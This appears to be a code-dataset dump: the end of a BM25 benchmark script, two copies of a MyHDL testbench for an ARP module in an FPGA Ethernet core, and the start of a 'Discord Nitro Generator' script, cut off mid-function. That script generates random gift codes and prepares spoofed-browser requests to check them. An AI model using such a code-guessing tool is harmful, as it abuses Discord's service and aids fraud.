logger.info("Average time taken: {:.2f}ms".format(time_taken / len(queries)))
logger.info(f"Results size: {len(results)}")
#### Evaluate your retrieval using NDCG@k, MAP@K ...
ndcg, _map, recall, precision = evaluate(qrels, results)
logger.info(f"MAP: {_map}") | en | 0.62628 | # -*- coding: utf-8 -*- @author:XuMing(<EMAIL>) @description: # Download scifact.zip dataset and unzip the dataset #### Loading test queries and corpus in DBPedia #### Randomly sample 1M pairs from Original Corpus (4.63M pairs) #### First include all relevant documents (i.e. present in qrels) #### Remove already seen k relevant documents and sample (1M - k) docs randomly # sample = 10 #### Index 1M passages into the index (seperately) #### Saving benchmark times #### Measure time to retrieve top-10 BM25 documents using single query latency # print(q_res) #### Measuring time taken in ms (milliseconds) # logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken)) # logger.info("\tsearch result: {}".format(results[:2])) #### Saving benchmark times with batch # queries = [queries[query_id] for query_id in query_ids] #### Measuring time taken in ms (milliseconds) #### Evaluate your retrieval using NDCG@k, MAP@K ... | 2.391567 | 2 |
tb/test_arp_64.py | sergachev/verilog-ethernet | 2 | 8548 | <reponame>sergachev/verilog-ethernet
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
import eth_ep
import arp_ep
module = 'arp_64'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/lfsr.v")
srcs.append("../rtl/arp_cache.v")
srcs.append("../rtl/arp_eth_rx_64.v")
srcs.append("../rtl/arp_eth_tx_64.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_eth_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_eth_payload_axis_tdata = Signal(intbv(0)[64:])
s_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
s_eth_payload_axis_tvalid = Signal(bool(0))
s_eth_payload_axis_tlast = Signal(bool(0))
s_eth_payload_axis_tuser = Signal(bool(0))
m_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_ready = Signal(bool(0))
arp_request_valid = Signal(bool(0))
arp_request_ip = Signal(intbv(0)[32:])
arp_response_ready = Signal(bool(0))
local_mac = Signal(intbv(0)[48:])
local_ip = Signal(intbv(0)[32:])
gateway_ip = Signal(intbv(0)[32:])
subnet_mask = Signal(intbv(0)[32:])
clear_cache = Signal(bool(0))
# Outputs
s_eth_hdr_ready = Signal(bool(0))
s_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_valid = Signal(bool(0))
m_eth_dest_mac = Signal(intbv(0)[48:])
m_eth_src_mac = Signal(intbv(0)[48:])
m_eth_type = Signal(intbv(0)[16:])
m_eth_payload_axis_tdata = Signal(intbv(0)[64:])
m_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
m_eth_payload_axis_tvalid = Signal(bool(0))
m_eth_payload_axis_tlast = Signal(bool(0))
m_eth_payload_axis_tuser = Signal(bool(0))
arp_request_ready = Signal(bool(0))
arp_response_valid = Signal(bool(0))
arp_response_error = Signal(bool(0))
arp_response_mac = Signal(intbv(0)[48:])
# sources and sinks
eth_source_pause = Signal(bool(0))
eth_sink_pause = Signal(bool(0))
eth_source = eth_ep.EthFrameSource()
eth_source_logic = eth_source.create_logic(
clk,
rst,
eth_hdr_ready=s_eth_hdr_ready,
eth_hdr_valid=s_eth_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
eth_payload_tdata=s_eth_payload_axis_tdata,
eth_payload_tkeep=s_eth_payload_axis_tkeep,
eth_payload_tvalid=s_eth_payload_axis_tvalid,
eth_payload_tready=s_eth_payload_axis_tready,
eth_payload_tlast=s_eth_payload_axis_tlast,
eth_payload_tuser=s_eth_payload_axis_tuser,
pause=eth_source_pause,
name='eth_source'
)
eth_sink = eth_ep.EthFrameSink()
eth_sink_logic = eth_sink.create_logic(
clk,
rst,
eth_hdr_ready=m_eth_hdr_ready,
eth_hdr_valid=m_eth_hdr_valid,
eth_dest_mac=m_eth_dest_mac,
eth_src_mac=m_eth_src_mac,
eth_type=m_eth_type,
eth_payload_tdata=m_eth_payload_axis_tdata,
eth_payload_tkeep=m_eth_payload_axis_tkeep,
eth_payload_tvalid=m_eth_payload_axis_tvalid,
eth_payload_tready=m_eth_payload_axis_tready,
eth_payload_tlast=m_eth_payload_axis_tlast,
eth_payload_tuser=m_eth_payload_axis_tuser,
pause=eth_sink_pause,
name='eth_sink'
)
arp_request_source = axis_ep.AXIStreamSource()
arp_request_source_logic = arp_request_source.create_logic(
clk,
rst,
tdata=(arp_request_ip,),
tvalid=arp_request_valid,
tready=arp_request_ready,
name='arp_request_source'
)
arp_response_sink = axis_ep.AXIStreamSink()
arp_response_sink_logic = arp_response_sink.create_logic(
clk,
rst,
tdata=(arp_response_error, arp_response_mac),
tvalid=arp_response_valid,
tready=arp_response_ready,
name='arp_response_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_eth_hdr_valid=s_eth_hdr_valid,
s_eth_hdr_ready=s_eth_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_eth_payload_axis_tdata=s_eth_payload_axis_tdata,
s_eth_payload_axis_tkeep=s_eth_payload_axis_tkeep,
s_eth_payload_axis_tvalid=s_eth_payload_axis_tvalid,
s_eth_payload_axis_tready=s_eth_payload_axis_tready,
s_eth_payload_axis_tlast=s_eth_payload_axis_tlast,
s_eth_payload_axis_tuser=s_eth_payload_axis_tuser,
m_eth_hdr_valid=m_eth_hdr_valid,
m_eth_hdr_ready=m_eth_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_eth_payload_axis_tdata=m_eth_payload_axis_tdata,
m_eth_payload_axis_tkeep=m_eth_payload_axis_tkeep,
m_eth_payload_axis_tvalid=m_eth_payload_axis_tvalid,
m_eth_payload_axis_tready=m_eth_payload_axis_tready,
m_eth_payload_axis_tlast=m_eth_payload_axis_tlast,
m_eth_payload_axis_tuser=m_eth_payload_axis_tuser,
arp_request_valid=arp_request_valid,
arp_request_ready=arp_request_ready,
arp_request_ip=arp_request_ip,
arp_response_valid=arp_response_valid,
arp_response_ready=arp_response_ready,
arp_response_error=arp_response_error,
arp_response_mac=arp_response_mac,
local_mac=local_mac,
local_ip=local_ip,
gateway_ip=gateway_ip,
subnet_mask=subnet_mask,
clear_cache=clear_cache
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
local_mac.next = 0xDAD1D2D3D4D5
local_ip.next = 0xc0a80165
gateway_ip.next = 0xc0a80101
subnet_mask.next = 0xFFFFFF00
yield clk.posedge
print("test 1: ARP request")
current_test.next = 1
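# A remote host broadcasts an ARP request for the local IP; the DUT should reply with its own MAC and cache the sender's MAC/IP pair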
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xFFFFFFFFFFFF
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 1
test_frame.arp_sha = 0x5A5152535455
test_frame.arp_spa = 0xc0a80164
test_frame.arp_tha = 0x000000000000
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0x5A5152535455
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 2
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x5A5152535455
assert check_frame.arp_tpa == 0xc0a80164
yield delay(100)
yield clk.posedge
print("test 2: Cached read")
current_test.next = 2
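# The sender from test 1 is now cached, so the lookup returns its MAC without generating any ARP traffic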
arp_request_source.send([(0xc0a80164,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x5A5152535455
yield delay(100)
yield clk.posedge
print("test 3: Unached read")
current_test.next = 3
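# Unknown address inside the subnet: the DUT broadcasts an ARP request and only answers the lookup after the reply arrives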
arp_request_source.send([(0xc0a80166,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80166
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x6A6162636465
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0x6A6162636465
test_frame.arp_spa = 0xc0a80166
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x6A6162636465
yield delay(100)
yield clk.posedge
print("test 4: Unached read, outside of subnet")
current_test.next = 4
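# The target is outside the configured subnet, so the DUT resolves the gateway address (0xc0a80101) instead of the target itself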
arp_request_source.send([(0x08080808,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80101
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0xAABBCCDDEEFF
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0xAABBCCDDEEFF
test_frame.arp_spa = 0xc0a80101
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xAABBCCDDEEFF
yield delay(100)
yield clk.posedge
print("test 5: Unached read, timeout")
current_test.next = 5
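# No host ever replies; the DUT retries the broadcast (four requests expected) and then signals a lookup error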
arp_request_source.send([(0xc0a80167,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert err
# check for 4 ARP requests
assert eth_sink.count() == 4
while not eth_sink.empty():
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80167
yield delay(100)
yield clk.posedge
print("test 6: Broadcast")
current_test.next = 6
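# Subnet and global broadcast addresses resolve directly to ff:ff:ff:ff:ff:ff without any ARP traffic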
# subnet broadcast
arp_request_source.send([(0xc0a801ff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
# general broadcast
arp_request_source.send([(0xffffffff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| #!/usr/bin/env python
"""
Copyright (c) 2014-2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
import eth_ep
import arp_ep
module = 'arp_64'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/lfsr.v")
srcs.append("../rtl/arp_cache.v")
srcs.append("../rtl/arp_eth_rx_64.v")
srcs.append("../rtl/arp_eth_tx_64.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_eth_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_eth_payload_axis_tdata = Signal(intbv(0)[64:])
s_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
s_eth_payload_axis_tvalid = Signal(bool(0))
s_eth_payload_axis_tlast = Signal(bool(0))
s_eth_payload_axis_tuser = Signal(bool(0))
m_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_ready = Signal(bool(0))
arp_request_valid = Signal(bool(0))
arp_request_ip = Signal(intbv(0)[32:])
arp_response_ready = Signal(bool(0))
local_mac = Signal(intbv(0)[48:])
local_ip = Signal(intbv(0)[32:])
gateway_ip = Signal(intbv(0)[32:])
subnet_mask = Signal(intbv(0)[32:])
clear_cache = Signal(bool(0))
# Outputs
s_eth_hdr_ready = Signal(bool(0))
s_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_valid = Signal(bool(0))
m_eth_dest_mac = Signal(intbv(0)[48:])
m_eth_src_mac = Signal(intbv(0)[48:])
m_eth_type = Signal(intbv(0)[16:])
m_eth_payload_axis_tdata = Signal(intbv(0)[64:])
m_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
m_eth_payload_axis_tvalid = Signal(bool(0))
m_eth_payload_axis_tlast = Signal(bool(0))
m_eth_payload_axis_tuser = Signal(bool(0))
arp_request_ready = Signal(bool(0))
arp_response_valid = Signal(bool(0))
arp_response_error = Signal(bool(0))
arp_response_mac = Signal(intbv(0)[48:])
# sources and sinks
eth_source_pause = Signal(bool(0))
eth_sink_pause = Signal(bool(0))
eth_source = eth_ep.EthFrameSource()
eth_source_logic = eth_source.create_logic(
clk,
rst,
eth_hdr_ready=s_eth_hdr_ready,
eth_hdr_valid=s_eth_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
eth_payload_tdata=s_eth_payload_axis_tdata,
eth_payload_tkeep=s_eth_payload_axis_tkeep,
eth_payload_tvalid=s_eth_payload_axis_tvalid,
eth_payload_tready=s_eth_payload_axis_tready,
eth_payload_tlast=s_eth_payload_axis_tlast,
eth_payload_tuser=s_eth_payload_axis_tuser,
pause=eth_source_pause,
name='eth_source'
)
eth_sink = eth_ep.EthFrameSink()
eth_sink_logic = eth_sink.create_logic(
clk,
rst,
eth_hdr_ready=m_eth_hdr_ready,
eth_hdr_valid=m_eth_hdr_valid,
eth_dest_mac=m_eth_dest_mac,
eth_src_mac=m_eth_src_mac,
eth_type=m_eth_type,
eth_payload_tdata=m_eth_payload_axis_tdata,
eth_payload_tkeep=m_eth_payload_axis_tkeep,
eth_payload_tvalid=m_eth_payload_axis_tvalid,
eth_payload_tready=m_eth_payload_axis_tready,
eth_payload_tlast=m_eth_payload_axis_tlast,
eth_payload_tuser=m_eth_payload_axis_tuser,
pause=eth_sink_pause,
name='eth_sink'
)
arp_request_source = axis_ep.AXIStreamSource()
arp_request_source_logic = arp_request_source.create_logic(
clk,
rst,
tdata=(arp_request_ip,),
tvalid=arp_request_valid,
tready=arp_request_ready,
name='arp_request_source'
)
arp_response_sink = axis_ep.AXIStreamSink()
arp_response_sink_logic = arp_response_sink.create_logic(
clk,
rst,
tdata=(arp_response_error, arp_response_mac),
tvalid=arp_response_valid,
tready=arp_response_ready,
name='arp_response_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_eth_hdr_valid=s_eth_hdr_valid,
s_eth_hdr_ready=s_eth_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_eth_payload_axis_tdata=s_eth_payload_axis_tdata,
s_eth_payload_axis_tkeep=s_eth_payload_axis_tkeep,
s_eth_payload_axis_tvalid=s_eth_payload_axis_tvalid,
s_eth_payload_axis_tready=s_eth_payload_axis_tready,
s_eth_payload_axis_tlast=s_eth_payload_axis_tlast,
s_eth_payload_axis_tuser=s_eth_payload_axis_tuser,
m_eth_hdr_valid=m_eth_hdr_valid,
m_eth_hdr_ready=m_eth_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_eth_payload_axis_tdata=m_eth_payload_axis_tdata,
m_eth_payload_axis_tkeep=m_eth_payload_axis_tkeep,
m_eth_payload_axis_tvalid=m_eth_payload_axis_tvalid,
m_eth_payload_axis_tready=m_eth_payload_axis_tready,
m_eth_payload_axis_tlast=m_eth_payload_axis_tlast,
m_eth_payload_axis_tuser=m_eth_payload_axis_tuser,
arp_request_valid=arp_request_valid,
arp_request_ready=arp_request_ready,
arp_request_ip=arp_request_ip,
arp_response_valid=arp_response_valid,
arp_response_ready=arp_response_ready,
arp_response_error=arp_response_error,
arp_response_mac=arp_response_mac,
local_mac=local_mac,
local_ip=local_ip,
gateway_ip=gateway_ip,
subnet_mask=subnet_mask,
clear_cache=clear_cache
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
local_mac.next = 0xDAD1D2D3D4D5
local_ip.next = 0xc0a80165
gateway_ip.next = 0xc0a80101
subnet_mask.next = 0xFFFFFF00
yield clk.posedge
print("test 1: ARP request")
current_test.next = 1
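# A remote host broadcasts an ARP request for the local IP; the DUT should reply with its own MAC and cache the sender's MAC/IP pair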
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xFFFFFFFFFFFF
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 1
test_frame.arp_sha = 0x5A5152535455
test_frame.arp_spa = 0xc0a80164
test_frame.arp_tha = 0x000000000000
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0x5A5152535455
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 2
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x5A5152535455
assert check_frame.arp_tpa == 0xc0a80164
yield delay(100)
yield clk.posedge
print("test 2: Cached read")
current_test.next = 2
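# The sender from test 1 is now cached, so the lookup returns its MAC without generating any ARP traffic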
arp_request_source.send([(0xc0a80164,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x5A5152535455
yield delay(100)
yield clk.posedge
print("test 3: Unached read")
current_test.next = 3
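# Unknown address inside the subnet: the DUT broadcasts an ARP request and only answers the lookup after the reply arrives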
arp_request_source.send([(0xc0a80166,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80166
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x6A6162636465
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0x6A6162636465
test_frame.arp_spa = 0xc0a80166
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x6A6162636465
yield delay(100)
yield clk.posedge
        print("test 4: Uncached read, outside of subnet")
current_test.next = 4
arp_request_source.send([(0x08080808,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80101
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0xAABBCCDDEEFF
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0xAABBCCDDEEFF
test_frame.arp_spa = 0xc0a80101
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xAABBCCDDEEFF
yield delay(100)
yield clk.posedge
        print("test 5: Uncached read, timeout")
current_test.next = 5
arp_request_source.send([(0xc0a80167,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert err
# check for 4 ARP requests
assert eth_sink.count() == 4
while not eth_sink.empty():
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80167
yield delay(100)
yield clk.posedge
print("test 6: Broadcast")
current_test.next = 6
# subnet broadcast
arp_request_source.send([(0xc0a801ff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
# general broadcast
arp_request_source.send([(0xffffffff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
    test_bench()
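# The check() generator above exercises six scenarios: answering an incoming
# ARP request (test 1), serving a cached lookup (test 2), resolving uncached
# addresses inside and outside the local subnet via broadcast requests
# (tests 3 and 4), retrying four times and flagging an error on timeout
# (test 5), and returning the broadcast MAC for subnet-directed and global
# broadcast addresses (test 6).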
NitroGenerator.py | ATRS7391/Discord_Nitro_Generator_And_Checker_Python_Version | 2 | 8549 |
import random
import sys
import subprocess
def pip_install(module: str):
subprocess.run([sys.executable, "-m", "pip", "-q", "--disable-pip-version-check", "install", module])
try:
import requests
except:
print("'requests' module not found! Trying to install... ")
pip_install("requests")
import requests
def print_header():
header = """
+-------------------------+
| Discord Nitro Generator |
+-------------------------+
Note: For Educational Purposes Only
© ATRS 2021. All Rights Reserved.
"""
print(header)
def get_code(nitro_type: str):
characters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u',
'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'A', 'B', 'C', 'D', 'E',
'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
if nitro_type == "Boost":
return str("".join([random.choice(characters) for char in range(24)]))
elif nitro_type == "Classic":
return str("".join([random.choice(characters) for char in range(16)]))
def check_code(nitro_code: str):
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
